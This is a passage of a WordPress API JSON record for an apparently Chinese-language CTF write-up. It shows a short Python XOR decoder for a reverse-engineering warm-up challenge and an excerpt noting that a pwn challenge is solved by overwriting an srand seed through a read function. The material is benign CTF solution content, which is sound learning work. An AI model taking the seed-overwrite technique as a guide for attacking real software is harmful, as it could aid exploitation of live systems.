78910112\nprint(\"Flag:\", random_num(seed))<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Reverse_2_easy_re-ucsc\"><\/span><strong>Reverse 2 easy_re-ucsc<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u9006\u5411\u7b7e\u5230\u9898\uff0c\u7b80\u5355\u5f02\u6216\u5373\u53ef\u5f97\u5230flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/2C40240B51544C2BB029D718422B2F67.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"528\" height=\"261\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/2C40240B51544C2BB029D718422B2F67.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1035\"  sizes=\"auto, (max-width: 528px) 100vw, 528px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>Str = \"n=&lt;;:h2&lt;'?8:?'9hl9'h:l&gt;'2&gt;&gt;2&gt;hk=&gt;;:?\"\nv7 = 10\nflag = ''.join(chr(ord(c) ^ v7) for c in Str)\nprint(flag)<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><\/h3>\n","protected":false},"excerpt":{"rendered":"<p>PWN1 BoFido-ucsc Srand\u4f2a\u968f\u673a\u7ed5\u8fc7\uff0cRead\u51fd\u6570\u53ef\u4ee5\u8986\u76d6seed\uff0c\u628aseed\u8986\u76d6\u6210\u56fa\u5b9a\u503c\uff08 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1022","post","type-post","status-publish","format-standard","hentry","category-game"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=1022"}],"version-history":[{"count":2,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1022\/revisions"}],"predecessor-version":[{"id":1037,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1022\/revisions\/1037"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=1022"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=1022"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=1022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}